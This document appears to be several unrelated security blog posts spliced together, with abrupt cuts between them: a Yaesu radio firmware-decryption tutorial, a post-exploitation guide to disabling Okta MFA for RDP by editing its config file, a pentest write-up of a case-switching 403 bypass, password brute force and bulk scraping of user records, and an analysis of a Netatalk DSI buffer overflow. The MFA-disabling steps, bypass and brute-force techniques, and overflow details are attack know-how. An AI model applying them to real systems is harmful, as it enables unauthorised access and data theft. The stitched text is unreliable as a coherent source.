This article dives into my full methodology for reverse engineering the firmware update tool discussed below. It’s a bit long, but it’s intended to be accessible to folks who aren’t necessarily advanced reverse engineers.
Background
Ham radios are a fun way of learning how the radio spectrum works, and more importantly: they’re embedded devices that may run weird chips/firmware! I got curious how easy it’d be to hack my Yaesu FT-70D, so I started doing some research. The only existing resource I could find for Yaesu radios was someone who posted about custom firmware for their Yaesu FT1DR.
The Reddit poster mentioned that if you go through the firmware update process via USB, the radio exposes its Renesas H8SX microcontroller and can have its flash modified using the Renesas SDK. This was a great start and looked promising, but the SDK wasn’t trivial to configure and I wasn’t sure if it could even dump the firmware… so I didn’t use it for very long.
Other Avenues
Yaesu provides a Windows application on their website that can be used to update a radio’s firmware over USB:
The zip contains the following files:
1.2 MB Wed Nov 8 14:34:38 2017 FT-70D_ver111(USA).exe
682 KB Tue Nov 14 00:00:00 2017 FT-70DR_DE_Firmware_Update_Information_ENG_1711-B.pdf
8 MB Mon Apr 23 00:00:00 2018 FT-70DR_DE_MAIN_Firmware_Ver_Up_Manual_ENG_1804-B.pdf
3.2 MB Fri Jan 6 17:54:44 2012 HMSEUSBDRIVER.exe
160 KB Sat Sep 17 15:14:16 2011 RComms.dll
61 KB Tue Oct 23 17:02:08 2012 RFP_USB_VB.dll
1.7 MB Fri Mar 29 11:54:02 2013 vcredist_x86.exe
I’m going to assume that the file specific to the FT-70D, «FT-70D_ver111(USA).exe», will likely contain our firmware image. A PE file (.exe) can contain binary resources in the .rsrc section — let’s see what this file contains using XPEViewer:
Resources fit into one of many different resource types, but a firmware image would likely be put into a custom type. What’s this last entry, «23»? Expanding that node we have a couple of interesting items:
RES_START_DIALOG is a custom string the updater shows when preparing an update, so we’re in the right area! RES_UPDATE_INFO looks like just binary data — perhaps this is our firmware image? Unfortunately, looking at the «Strings» tab in XPEViewer or running the strings utility over this data doesn’t yield anything legible. The firmware image is likely encrypted.
Reverse Engineering the Binary
Let’s load the update utility into our disassembler of choice to figure out how the data is encrypted. I’ll be using IDA Pro, but Ghidra (free!), radare2 (free!), or Binary Ninja are all great alternatives. Where possible in this article I’ll try to show my rewritten code in C since it’ll be a closer match to the decompiler and machine code output.
A good starting point is the string we saw above, RES_UPDATE_INFO. Windows applications load resources by calling one of the FindResource* functions, which take:
hModule, a handle to the module to look for the resource in.
lpName, the resource name.
lpType, the resource type.
In our disassembler we can find references to the RES_UPDATE_INFO string and look for calls to FindResourceA with this string as an argument in the lpName position.
We find a match in a function which happens to find/load all of these custom resources under type 23.
We know where the data is loaded by the application, so now we need to see how it’s used. Doing static analysis from this point may be more work than it’s worth if the data isn’t operated on immediately. To speed things up I’m going to use a debugger’s assistance. I used WinDbg’s Time Travel Debugging to record an execution trace of the updater while it updates my radio. TTD is an invaluable tool and I’d highly recommend using it when possible. rr is an alternative for non-Windows platforms.
The decompiler output shows this function copies the RES_UPDATE_INFO resource to a dynamically allocated buffer. The qmemcpy() is inlined and represented by a rep movsd instruction in the disassembly, so we need to break at this instruction and examine the edi register’s (destination address) value. I set a breakpoint by typing bp 0x406968 in the command window, allow the application to continue running, and when it breaks we can see the edi register value is 0x2be5020. We can now set a memory access breakpoint at this address using ba r4 0x2be5020 to break whenever this data is read.
Our breakpoint is hit at 0x4047DC — back to the disassembler. In IDA you can press G and enter this address to jump to it. We’re finally at what looks like the data processing function:
We broke when dereferencing v2, and IDA has automatically named the variable it’s being assigned to as Time. The Time variable is passed to another function which formats it as a string with %Y%m%d%H%M%S. Let’s clean up the variables to reflect what we know:
010 Editor has a built-in strings utility (Search > Find Strings…) and if we scroll down a bit in the results, we have real strings that appear in my radio!
At this point if we were just interested in getting the plaintext firmware we could stop messing with the binary and load the firmware into IDA Pro… but I want to know how this encryption works.
Encryption Details
Just to recap from the last section:
We’ve identified our data processing routine (let’s call this function decrypt_update_info).
We know that the first 4 bytes of the update data are a Unix timestamp that’s formatted as a string and used for an unknown purpose.
We know which function begins decrypting our firmware image.
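As a sketch of the second point, the timestamp handling presumably looks something like the following; the little-endian byte order and the use of UTC are my assumptions, not something confirmed from the binary:

```c
#include <stdint.h>
#include <string.h>
#include <time.h>

/* Interpret the first 4 bytes of the update data as a little-endian
 * Unix timestamp (byte order is an assumption) and format it the way
 * the updater does with %Y%m%d%H%M%S. `out` must hold 15 bytes. */
void format_update_timestamp(const uint8_t header[4], char out[15])
{
    time_t ts = (time_t)((uint32_t)header[0]
                       | ((uint32_t)header[1] << 8)
                       | ((uint32_t)header[2] << 16)
                       | ((uint32_t)header[3] << 24));
    struct tm tm_utc;
    gmtime_r(&ts, &tm_utc);  /* UTC keeps the sketch deterministic */
    strftime(out, 15, "%Y%m%d%H%M%S", &tm_utc);
}
```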
Data Decryption
Let’s look at the firmware image decryption routine with some renamed variables:
int __thiscall decrypt_data(
void *this,
char *encrypted_data,
int encrypted_data_len,
char *output_data,
int output_data_len,
_DWORD *bytes_written)
{
int data_len; // edx
int output_index; // ebp
int block_size; // esi
unsigned int i; // ecx
char encrypted_byte; // al
char *idata; // eax
int remaining_data; // [esp+10h] [ebp-54h]
char inflated_data[64]; // [esp+20h] [ebp-44h] BYREF
data_len = encrypted_data_len;
output_index = 0;
memset(inflated_data, 0, sizeof(inflated_data));
if ( encrypted_data_len <= 0 )
{
LABEL_13:
*bytes_written = output_index;
return 0;
}
else
{
while ( 1 )
{
block_size = data_len;
if ( data_len >= 8 )
block_size = 8;
remaining_data = data_len - block_size;
// inflate 1 byte of input data to 8 bytes of its bit representation
for ( i = 0; i < 0x40; i += 8 )
{
encrypted_byte = *encrypted_data;
inflated_data[i] = (unsigned __int8)*encrypted_data >> 7;
inflated_data[i + 1] = (encrypted_byte & 0x40) != 0;
inflated_data[i + 2] = (encrypted_byte & 0x20) != 0;
inflated_data[i + 3] = (encrypted_byte & 0x10) != 0;
inflated_data[i + 4] = (encrypted_byte & 8) != 0;
inflated_data[i + 5] = (encrypted_byte & 4) != 0;
inflated_data[i + 6] = (encrypted_byte & 2) != 0;
inflated_data[i + 7] = encrypted_byte & 1;
++encrypted_data;
}
// do something with the inflated data
sub_407980(this, inflated_data, 0);
if ( block_size )
break;
LABEL_12:
if ( remaining_data <= 0 )
goto LABEL_13;
data_len = remaining_data;
}
// deflate the data back to bytes
idata = &inflated_data[1];
while ( 1 )
{
--block_size;
if ( output_index >= output_data_len )
return -101;
output_data[output_index++] = idata[6] | (2
* (idata[5] | (2
* (idata[4] | (2
* (idata[3] | (2
* (idata[2] | (2
* (idata[1] | (2 * (*idata | (2 * *(idata - 1))))))))))))));
idata += 8;
if ( !block_size )
goto LABEL_12;
}
}
}
At a high level this routine:
Allocates a 64-byte scratch buffer.
Checks if there’s any data to process. If not, sets the output variable bytes_written to the number of bytes processed and returns 0x0 (STATUS_SUCCESS).
Loops over the input data in 8-byte chunks and inflates each byte to its bit representation.
After the 8-byte chunk is inflated, calls sub_407980 with the scratch buffer and 0 as arguments.
Loops over the scratch buffer, reassembles 8 sequential bits as 1 byte, then sets the byte at the appropriate index in the output buffer.
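The inflate and deflate steps can be reimplemented as a pair of small helpers (my reconstruction, not the decompiled code):

```c
#include <stddef.h>
#include <stdint.h>

/* Expand each input byte into 8 bytes, one per bit, MSB first --
 * mirroring the inflation loop in the decrypt routine. `out` must
 * hold len * 8 bytes. */
void inflate_bits(const uint8_t *in, size_t len, uint8_t *out)
{
    for (size_t i = 0; i < len; i++)
        for (int bit = 0; bit < 8; bit++)
            out[i * 8 + bit] = (in[i] >> (7 - bit)) & 1;
}

/* Pack 8 bit-bytes back into one byte -- the reverse transform used
 * when reassembling the output buffer. */
void deflate_bits(const uint8_t *in, size_t len, uint8_t *out)
{
    for (size_t i = 0; i < len; i++) {
        uint8_t b = 0;
        for (int bit = 0; bit < 8; bit++)
            b = (uint8_t)((b << 1) | in[i * 8 + bit]);
        out[i] = b;
    }
}
```

Round-tripping any buffer through inflate_bits() and deflate_bits() returns the original bytes, which is a handy sanity check when reimplementing the decryption.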
Lots going on here, but let’s take a look at step #3. If we take the bytes 0xAA and 0x77, which have bit representations of 0b1010_1010 and 0b0111_0111 respectively, and inflate them to a 16-byte array using the algorithm above, we end up with:
Oof. This is substantially more complicated, but it looks like the meat of the decryption algorithm. We’ll refer to this function, sub_407980, as decrypt_data from here on out. We can see what may be an immediate roadblock: this function takes in a C++ this pointer (line 5) and performs bitwise operations on one of its members (lines 18, 23, etc.). For now let’s call this class member key and come back to it later.
This function is the perfect example of decompilers emitting less than ideal code as a result of compiler optimizations/code reordering. For me, TTD was essential for following how data flows through this function. It took a few hours of banging my head against IDA and WinDbg to understand, but this function can be broken up into 3 high-level phases:
Building a 48-byte buffer containing our key material XOR’d with data from a static table.
int v33;
unsigned __int8 v34; // [esp+44h] [ebp-34h]
unsigned __int8 v35; // [esp+45h] [ebp-33h]
unsigned __int8 v36; // [esp+46h] [ebp-32h]
unsigned __int8 v37; // [esp+47h] [ebp-31h]
char v38[44]; // [esp+48h] [ebp-30h]
v3 = (int)this;
v4 = 15;
v5 = a3;
v32[0] = (int)this;
v28 = 0;
v31 = 15;
do
{
// The end statement of this loop is strange -- it's writing a byte somewhere? come back
// to this later
for ( i = 0; i < 48; *((_BYTE *)&v33 + i + 3) = v18 )
{
// v28 Starts at 0 but is incremented by 1 during each iteration of the outer `while` loop
v7 = v28;
// v5 is our last argument which was 0
if ( !v5 )
// overwrite v7 with v4, which begins at 15 but is decremented by 1 during each iteration
// of the outer `while` loop
v7 = v4;
// left-hand side of the xor, *(_BYTE *)(i + 48 * v7 + v3 + 4)
// v3 in this context is our `this` pointer + 4, giving us *(_BYTE *)(i + (48 * v7) + this->maybe_key)
// so the left-hand side of the xor is likely indexing into our key material:
// this->maybe_key[i + 48 * loop_multiplier]
//
// right-hand side of the xor, a2[(unsigned __int8)byte_424E50[i] + 31]
// a2 is our input encrypted data, and byte_424E50 is some static data
//
// this full statement can be rewritten as:
// v8 = this->maybe_key[i + 48 * loop_multiplier] ^ encrypted_data[byte_424E50[i] + 31]
v8 = *(_BYTE *)(i + 48 * v7 + v3 + 4) ^ a2[(unsigned __int8)byte_424E50[i] + 31];
v9 = v28;
// write the result of `key_data ^ input_data` to a scratch buffer (v34)
// v34 looks to be declared as the wrong type. v33 is actually a 52-byte buffer
*(&v34 + i) = v8;
// repeat the above 5 more times
if ( !v5 )
v9 = v4;
v10 = *(_BYTE *)(i + 48 * v9 + v3 + 5) ^ a2[(unsigned __int8)byte_424E51[i] + 31];
v11 = v28;
*(&v35 + i) = v10;
// snip
// v18 gets written to the scratch buffer at the end of the loop...
v18 = *(_BYTE *)(i + 48 * v17 + v3 + 9) ^ a2[(unsigned __int8)byte_424E55[i] + 31];
// this was probably the *real* last statement of the for-loop
// i.e. for (int i = 0; i < 48; i += 6)
i += 6;
}
Build a 32-byte buffer containing data from an 0x800-byte static table, with indexes into this table originating from indices built from the buffer in step #1. Combine this 32-byte buffer with the 48-byte buffer in step #1.
// dword_424E80 -- some static data
// (unsigned __int8)v38[0] + 2) -- the original decompiler output has this wrong.
// v33 should be a 52-byte buffer which consumes v38, so v38 is actually data set up in
// the loop above.
// (32 * v34 + 2) -- v34 should be some data from the above loop as well. This looks like
// a binary shift optimization
// repeat with different multipliers...
//
// This can be simplified as:
// size_t index = ((v34 << 5) + 2)
// | ((v37[1] << 4) + 2)
// | ((v35 << 3) + 2)
// | ((v36 << 2) + 2)
// | ((v37 << 1) + 2)
// | v38[0]
// v32[1] = *(int*)(((char*)&dword_424e80)[index])
v32[1] = *(int *)((char *)&dword_424E80
+ (((unsigned __int8)v38[0] + 2) | (32 * v34 + 2) | (16 * (unsigned __int8)v38[1] + 2) | (8 * v35 + 2) | (4 * v36 + 2) | (2 * v37 + 2)));
// repeat 7 times. each time the reference to dword_424e80 is shifted forward by 0x100.
// note: if you do the math, the next line looks like it uses dword_424e80[64]. We shift
// by 0x100 instead of 64 because dword_424e80 is declared as an int array -- not a char array.
Iterate over the next 8 bytes of the output buffer. For each byte index of the output buffer, index into yet another static 32-byte buffer and use that as the index into the table from step #2. XOR this value with the value at the current index of the output buffer.
// Not really sure why this calculation works like this. It ends up just being `unk_425681`'s address
// when it's used.
v19 = (char *)(&unk_425681 - (_UNKNOWN *)a2);
v20 = &unk_425680 - (_UNKNOWN *)a2;
// v4 is a number that's decremented on every iteration -- possibly bytes remaining?
if ( v4 <= 0 )
{
// Loop over 8 bytes
v30 = 8;
do
{
// Start XORing the output bytes with some of the data generated in step 2.
//
// Cheating here and doing the "draw the rest of the owl", but if you observe that
// we use `unk_425680` (v20), `unk_425681` (v19), `unk_425682`, and byte_425683,
// the decompiler generated suboptimal code. We can simplify to be relative to just
// `unk_425680`
//
// *result ^= step2_bytes[unk_425680[output_index] - 1]
*result ^= *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);
// result[1] ^= step2_bytes[unk_425680[output_index] + 1]
result[1] ^= *((_BYTE *)v32 + (unsigned __int8)v19[(_DWORD)result] + 3);
// result[2] ^= step2_bytes[unk_425680[output_index] + 2]
result[2] ^= *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2] + 3);
// result[3] ^= step2_bytes[unk_425680[output_index] + 3]
result[3] ^= *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2] + 3);
// Move our pointer to the output buffer forward by 4 bytes
result += 4;
--v30;
}
while ( v30 );
}
else
{
// loop over 8 bytes
v29 = 8;
do
{
// grab the byte at 0x20, we're swapping this later
v24 = result[32];
// v22 = *result ^ step2_bytes[unk_425680[output_index] - 1]
v22 = *result ^ *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);
// I'm not sure why the output buffer pointer is incremented here, but
// this really makes the code ugly
result += 4;
// Write the byte generated above to offset 0x1c
result[28] = v22;
// Write the byte at 0x20 to offset 0
*(result - 4) = v24;
// rinse, repeat with slightly different offsets each time...
v25 = result[29];
result[29] = *(result - 3) ^ *((_BYTE *)v32 + (unsigned __int8)result[(_DWORD)v19 - 4] + 3);
*(result - 3) = v25;
v26 = result[30];
result[30] = *(result - 2) ^ *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2 - 4] + 3);
*(result - 2) = v26;
v27 = result[31];
result[31] = *(result - 1) ^ *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2 - 4] + 3);
*(result - 1) = v27;
--v29;
}
while ( v29 );
}
The inner loop in the else branch above is, I think, kind of nasty, so here it is reimplemented in Rust:
for _ in 0..8 {
// we swap the `first` index with the `second`
for (first, second) in (0x1c..=0x1f).zip(0..4) {
let original_byte_idx = first + output_offset + 4;
let original_byte = outbuf[original_byte_idx];
let constant = unk_425680[output_offset + second] as usize;
let new_byte = outbuf[output_offset + second] ^ generated_bytes_from_step2[constant - 1];
let new_idx = original_byte_idx;
outbuf[new_idx] = new_byte;
outbuf[output_offset + second] = original_byte;
}
output_offset += 4;
}
Key Setup
We now need to figure out how our key is set up for usage in the decrypt_data function above. My approach here is to set a breakpoint at the first instruction to use the key data in decrypt_data, which happens to be xor bl, [ecx + esi + 4] at 0x4079d3. I know this is where we should break because in the decompiler output the left-hand side of the XOR operation, the key material, will be the second operand in the xor instruction. As a reminder, the decompiler shows the XOR as:
The breakpoint is hit and the address we’re loading from is 0x19f5c4. We can now lean on TTD to help us figure out where this data was last written. Set a 1-byte memory write breakpoint at this address using ba w1 0x19f5c4 and press the Go Back button. If you’ve never used TTD before, this operates exactly as Go would, except backwards in the program’s trace. In this case it will execute backward until either a breakpoint is hit, an interrupt is generated, or we reach the start of the program.
Our memory write breakpoint gets triggered at 0x4078fb — a function we haven’t seen before. The callstack shows that it’s called not terribly far from the decrypt_update_info routine!
set_key (we are here — function is originally called sub_407850)
sub_4082c0
decrypt_update_info
What’s sub_4082c0?
Not a lot to see here except the same function called 4 times: initially with the timestamp string as the argument in position 0 and a 64-byte buffer, then a bunch of calls each using the return value of the last as its input. The function our debugger just broke into takes only 1 argument, which is the 64-byte buffer used across all of these function calls. So what’s going on in sub_407e80?
The bitwise operations look suspiciously similar to the byte-to-bit inflation we saw above with the firmware data. After renaming things and performing some loop unrolling, things look like this:
The first 4 bytes of the update data are a Unix timestamp.
The timestamp is formatted as a string, has each byte inflated to its bit representation, and is decrypted using some static key material as the key. This is repeated 4 times, with the output of the previous run used as an input to the next.
The resulting data from the previous step is used as a key for decrypting data.
The remainder of the firmware update image is inflated to its bit representation 8 bytes at a time, and the dynamic key plus 3 other unique static lookup tables are used to transform the inflated input data.
The result from the previous step is deflated back into its byte representation.
IDA thankfully supports disassembling the Hitachi/Renesas H8SX architecture. If we load our firmware into IDA and select the «Hitachi H8SX advanced» processor type, use the default options for the «Disassembly memory organization» dialog, then finally choose «H8S/2215R» in the «Choose the device name» dialog…:
We don’t have shit. I’m not an embedded systems expert, but my friend suggested that the first few DWORDs look like they may belong to a vector table. If we right-click address 0 and select «Double word 0x142A», we can click on the new variable
I’ll state this upfront, so as not to confuse: This is a POST exploitation technique. This is mostly for when you have already gained admin on the system via other means and want to be able to RDP without needing MFA.
Okta MFA Credential Provider for Windows enables strong authentication using MFA with Remote Desktop Protocol (RDP) clients. Using Okta MFA Credential Provider for Windows, RDP clients (Windows workstations and servers) are prompted for MFA when accessing supported domain joined Windows machines and servers.
This is going to be very similar to my other post about Bypassing Duo Two-Factor Authentication. I’d recommend reading that first to provide context to this post.
The biggest difference between Duo and Okta is that Okta does not have fail open as the default value, making that configuration less likely. It also does not have “RDP Only” as the default, making the console bypass less likely to succeed as well.
With that said, if you do have administrator level shell access, it is quite simple to disable.
For Okta, the configuration file is not stored in the registry like Duo but in a configuration file located at:
C:\Program Files\Okta\Okta Windows Credential Provider\config\rdp_app_config.json
There are two things you need to do:
Modify the InternetFailOpenOption value to true
Change the Url value to something that will not resolve.
After that, attempts to RDP will not prompt Okta MFA.
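For reference, here’s a sketch of what the modified rdp_app_config.json might contain. Only the two key names come from the steps above; the URL value and overall file layout here are illustrative, and the real file holds additional fields that should be left untouched:

```json
{
  "InternetFailOpenOption": true,
  "Url": "https://this-will-not-resolve.invalid"
}
```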
It is of course always possible to uninstall the software as an admin, but ideally we want to achieve our objective with the least intrusive means possible. These configuration files can easily be flipped back when you are done.
Today we’ll look at one of the external penetration tests that I carried out earlier this year. Due to the confidentiality agreement, we will use the usual domain of REDACTED.COM.
So, to provide a bit of context to the test, it is completely black box with zero information being provided by the customer. The only thing we know is that we are allowed to test redacted.com and the subdomain my.redacted.com.
I’ll skip through the whole passive information gathering process and will get straight to the point.
I start actively scanning and navigating through the website to discover potential entry points. There are no ports open other than 80 & 443.
So, I start directory bruteforcing with gobuster and straightaway, I see an admin panel that returns a 403 — Forbidden response.
gobuster
Seeing this, we navigate to the website to verify that it is indeed a 403 and to capture the request with Burp Suite for potential bypasses.
admin panel — 403
In my mind, I am thinking that it will be impossible to bypass this, because there is an ACL for internal IP addresses. Nevertheless, I tried the following to bypass the 403:
HTTP Methods fuzzing (GET, POST, TRACE, HEAD etc.)
Path fuzzing/force browsing (https://redacted.com/admin/index.html, https://redacted.com/admin/./index.html and more)
Protocol version changing (e.g. downgrading from HTTP/2 to HTTP/1.1, from HTTP/1.1 to HTTP/1.0 etc.)
String terminators (%00, 0x00, //, ;, %, !, ?, [] etc.) — adding those to the end of the path and inside the path
Long story short, none of those methods worked. So, I remember that sometimes the security controls are built around the literal spelling and case of components within a request. Therefore, I tried the ‘Case Switching’ technique — probably sounds dumb, but it actually worked!
To sum it up:
https://redacted.com/admin -> 403 Forbidden
https://redacted.com/Admin -> 200 OK
https://redacted.com/aDmin -> 200 OK
Switching any of the letters to a capital one will bypass the restriction.
Voila! We get a login page to the admin panel.
admin panel — bypassed 403
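If you want to automate this probe, generating every single-letter-uppercased variant of a path is trivial. A small helper of my own (not a standard tool):

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Generate path variants with exactly one letter upper-cased --
 * enough to probe a case-sensitive ACL sitting in front of a
 * case-insensitive backend. Returns the number of variants written. */
size_t case_variants(const char *path, char out[][64], size_t max)
{
    size_t n = 0;
    size_t len = strlen(path);
    for (size_t i = 0; i < len && n < max; i++) {
        if (!islower((unsigned char)path[i]))
            continue;
        strncpy(out[n], path, 63);
        out[n][63] = '\0';
        out[n][i] = (char)toupper((unsigned char)path[i]);
        n++;
    }
    return n;
}
```

Feeding each variant to the target (e.g. via Burp Intruder or curl) reproduces the /Admin, /aDmin, … probes above.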
We get lucky with this one, nevertheless, we are now able to try different attacks (password spraying, brute forcing etc.). The company that we are testing isn’t small and we had collected quite a large number of employee credentials from leaked databases (leak check, leak peek and others). However, this is the admin panel and therefore we go with the usual tests:
See if there is username enumeration
See if there are any login restrictions
Check for possible WAF that will block us due to number of requests
To keep it short, there is neither. We are unable to enumerate usernames, however there is no rate limiting of any sort.
Considering the above, we load rockyou.txt and start brute forcing the password of the ‘admin’ account. After a few thousand attempts, we see the below:
admin panel brute forcing w/ Burp Suite
We found valid credentials for the admin account. Navigate to the website’s admin panel, authenticate and we are in!
Admin panel — successful authentication
Now that we are in, there isn’t much more that we need to do or can do (without the consent of the customer). The admin panel with administrative privileges allows you to change the whole configuration — control the users & their attributes, control the website’s pages, control everything really. So, I decided to write a Python script that scrapes the whole database of users (around 39,300 of them), containing their names, emails, phones & addresses. The idea behind collecting all those details is to present them to the client (victim), to show the seriousness of the exploited vulnerabilities. Also, due to the severity of those security weaknesses, we wrote a report the same day for those specific issues, which were fixed within 24 hours.
Ultimately, there wasn’t anything too difficult in the whole exploitation process; however, the unusual 403 bypass is something I encountered for the first time, and I thought some of you might weaponize it or add it to your future 403 bypass checklists.
The Western Digital MyCloudHome is a consumer grade NAS with local network and cloud based functionalities. At the time of the contest (firmware 7.15.1-101) the device ran a custom Android distribution on an armv8l CPU. It exposed a few custom services and integrated some open source ones, such as the Netatalk daemon. This service was a prime target to compromise the device because it was running with root privileges and was reachable from the adjacent network. We will not discuss the initial surface discovery here, to focus more on the vulnerability. Instead we provide a detailed analysis of the vulnerability and how we exploited it.
Netatalk [2] is a free and Open Source [3] implementation of the Apple Filing Protocol (AFP) file server. This protocol is used in networked macOS environments to share files between devices. Netatalk is distributed via the service afpd, also available on many Linux distributions and devices. So the work presented in this article should also apply to other systems. Western Digital modified the sources a bit to accommodate the Android environment [4], but their changes are not relevant for this article so we will refer to the official sources.
AFP data is carried over the Data Stream Interface (DSI) protocol [5]. The exploited vulnerability lies in the DSI layer, which is reachable without any form of authentication.
OVERVIEW OF SERVER IMPLEMENTATION
The DSI layer
The server is implemented as a typical fork server, with a parent process listening on TCP port 548 and forking into new children to handle client sessions. The protocol exchanges different packets encapsulated by Data Stream Interface (DSI) headers of 16 bytes.
#define DSI_BLOCKSIZ 16
struct dsi_block {
uint8_t dsi_flags; /* packet type: request or reply */
uint8_t dsi_command; /* command */
uint16_t dsi_requestID; /* request ID */
union {
uint32_t dsi_code; /* error code */
uint32_t dsi_doff; /* data offset */
} dsi_data;
uint32_t dsi_len; /* total data length */
uint32_t dsi_reserved; /* reserved field */
};
A request is usually followed by a payload whose length is specified by the dsi_len field.
The meaning of the payload depends on what dsi_command is used. A session should start with the dsi_command byte set to DSIOpenSession (4). This is usually followed up by various DSICommand (2) packets to access more functionalities of the file share. In that case the first byte of the payload is an AFP command number specifying the requested operation.
dsi_requestID is an id that should be unique for each request, giving the server the chance to detect duplicated commands. As we will see later, Netatalk implements a replay cache based on this id to avoid executing a command twice.
It is also worth mentioning that the AFP protocol supports different schemes of authentication as well as anonymous connections. But this is out of the scope of this write-up, as the vulnerability is located in the DSI layer, before AFP authentication.
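To make the header layout concrete, here is a small sketch that serializes a 16-byte DSI header matching the struct above. Field order follows the struct definition, and the use of network byte order for the multi-byte fields is consistent with the ntohl() call we will see later in the server code:

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <string.h>

#define DSIFUNC_OPEN 4  /* DSIOpenSession */

/* Serialize a 16-byte DSI header into `out`, with multi-byte fields
 * in network byte order, per the struct dsi_block layout. */
void dsi_pack_header(uint8_t out[16], uint8_t flags, uint8_t command,
                     uint16_t request_id, uint32_t data_off, uint32_t len)
{
    out[0] = flags;                /* request (0) or reply (1) */
    out[1] = command;              /* e.g. DSIFUNC_OPEN */
    uint16_t id = htons(request_id);
    memcpy(out + 2, &id, 2);
    uint32_t doff = htonl(data_off);
    memcpy(out + 4, &doff, 4);     /* dsi_data union */
    uint32_t dlen = htonl(len);    /* length of the payload that follows */
    memcpy(out + 8, &dlen, 4);
    memset(out + 12, 0, 4);        /* reserved */
}
```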
A few notes about the server implementation
The DSI struct
To manage a client in a child process, the daemon uses a DSI *dsi struct. This represents the current connection with its buffers, and it is passed into most of the Netatalk functions. Here is the struct definition with some members edited out for the sake of clarity:
#define DSI_DATASIZ 65536
/* child and parent processes might interpret a couple of these
* differently. */
typedef struct DSI {
/* ... */
struct dsi_block header;
/* ... */
uint8_t *commands; /* DSI receive buffer */
uint8_t data[DSI_DATASIZ]; /* DSI reply buffer */
size_t datalen, cmdlen;
off_t read_count, write_count;
uint32_t flags; /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
int socket; /* AFP session socket */
int serversock; /* listening socket */
/* DSI readahead buffer used for buffered reads in dsi_peek */
size_t dsireadbuf; /* size of the DSI read ahead buffer used in dsi_peek() */
char *buffer; /* buffer start */
char *start; /* current buffer head */
char *eof; /* end of currently used buffer */
char *end;
/* ... */
} DSI;
We mainly see that the struct has:
The commands heap buffer used for receiving the user input, initialized in dsi_init_buffer() with a default size of 1MB;
cmdlen to specify the size of the input in commands;
An inlined data buffer of 64KB used for the reply;
datalen to specify the size of the output in data;
A read ahead heap buffer managed by the pointers buffer, start, eof, and end, with a default size of 12MB, also initialized in dsi_init_buffer().
The main loop flow
After receiving the DSIOpenSession command, the child process enters the main loop in afp_over_dsi(). This function dispatches incoming commands until the end of the communication. Its simplified code is the following:
void afp_over_dsi(AFPObj *obj)
{
DSI *dsi = (DSI *) obj->dsi;
/* ... */
/* get stuck here until the end */
while (1) {
/* ... */
/* Blocking read on the network socket */
cmd = dsi_stream_receive(dsi);
/* ... */
switch(cmd) {
case DSIFUNC_CLOSE:
/* ... */
case DSIFUNC_TICKLE:
/* ...*/
case DSIFUNC_CMD:
/* ... */
function = (u_char) dsi->commands[0];
/* ... */
err = (*afp_switch[function])(obj, dsi->commands, dsi->cmdlen, &dsi->data, &dsi->datalen);
/* ... */
default:
LOG(log_info, logtype_afpd,"afp_dsi: spurious command %d", cmd);
dsi_writeinit(dsi, dsi->data, DSI_DATASIZ);
dsi_writeflush(dsi);
break;
}
The receiving process
In the previous snippet, we saw that an idling server will receive the client data in
dsi_stream_receive()
. Because of the buffering attempts this function is a bit cumbersome. Here is an overview of the whole receiving process within
dsi_stream_receive()
.
dsi_stream_receive(DSI* dsi)
1. define char block[DSI_BLOCKSIZ] in its stack to receive a DSI header
2. dsi_buffered_stream_read(dsi, block, sizeof(block)) wait for a DSI header
1. from_buf(dsi, block, length)
Tries to fetch available data from already buffered input
in-between dsi->start and dsi->end
2. recv(dsi->socket, dsi->eof, buflen, 0)
Tries to receive at most 8192 bytes in a buffering attempt into the look ahead buffer
The socket is non-blocking so the call usually fails
3. dsi_stream_read(dsi, block, len))
1. buf_read(dsi, block, len)
1. from_buf(dsi, block, len)
Tries again to get data from the buffered input
2. readt(dsi->socket, block, len, 0, 0);
Receive data on the socket
This call will wait on a recv()/select() loop and is usually the blocking one
3. Populate &dsi->header from what has been received
4. dsi_stream_read(dsi, dsi->commands, dsi->cmdlen)
1. calls buf_read() to fetch the DSI payload
If not enough data is available, the call waits on select()
The main point to notice here is that the server only buffers the client data in the recv() of dsi_buffered_stream_read() when multiple or large commands are sent as one. Also, never more than 8KB are buffered.
THE VULNERABILITY
As seen in the previous snippets, in the main loop afp_over_dsi() can receive an unknown command id. In that case the server will call dsi_writeinit(dsi, dsi->data, DSI_DATASIZ), then dsi_writeflush(dsi).
We assume that the purpose of those two functions is to flush both the input and the output buffer, eventually purging the look ahead buffer. However these functions are really peculiar, and calling them here doesn’t seem correct. Worse, dsi_writeinit() has a buffer overflow vulnerability! Indeed, the function will flush out bytes from the look ahead buffer into its second argument dsi->data without checking the size provided in the third argument DSI_DATASIZ.
size_t dsi_writeinit(DSI *dsi, void *buf, const size_t buflen _U_)
{
size_t bytes = 0;
dsi->datasize = ntohl(dsi->header.dsi_len) - dsi->header.dsi_data.dsi_doff;
if (dsi->eof > dsi->start) {
/* We have data in the buffer */
bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
memmove(buf, dsi->start, bytes); // potential overflow here
dsi->start += bytes;
dsi->datasize -= bytes;
if (dsi->start >= dsi->eof)
dsi->start = dsi->eof = dsi->buffer;
}
LOG(log_maxdebug, logtype_dsi, "dsi_writeinit: remaining DSI datasize: %jd", (intmax_t)dsi->datasize);
return bytes;
}
This may lead to a corruption of the tail of the dsi struct, as dsi->data is an inlined buffer.

However, there is an important limitation: dsi->data has a size of 64KB, and we have seen that the look ahead buffer implementation reads at most 8KB of data in dsi_buffered_stream_read(). So in most cases dsi->eof - dsi->start is less than 8KB, which is not enough to overflow dsi->data.
Fortunately, there is still a complex way to buffer more than 8KB of data and to trigger this overflow. The next parts explain how to reach that point and exploit this vulnerability to achieve code execution.
Exploitation
TRIGGERING THE VULNERABILITY
Finding a way to push data in the look ahead buffer
The curious case of dsi_peek()
While the receiving process is not straightforward, the sending one is even more confusing. A lot of different functions are involved in sending data back to the client, and an interesting one is dsi_peek(DSI *dsi).
Here is the function documentation:
/*
* afpd is sleeping too much while trying to send something.
* May be there's no reader or the reader is also sleeping in write,
* look if there's some data for us to read, hopefully it will wake up
* the reader so we can write again.
*
* @returns 0 when is possible to send again, -1 on error
*/
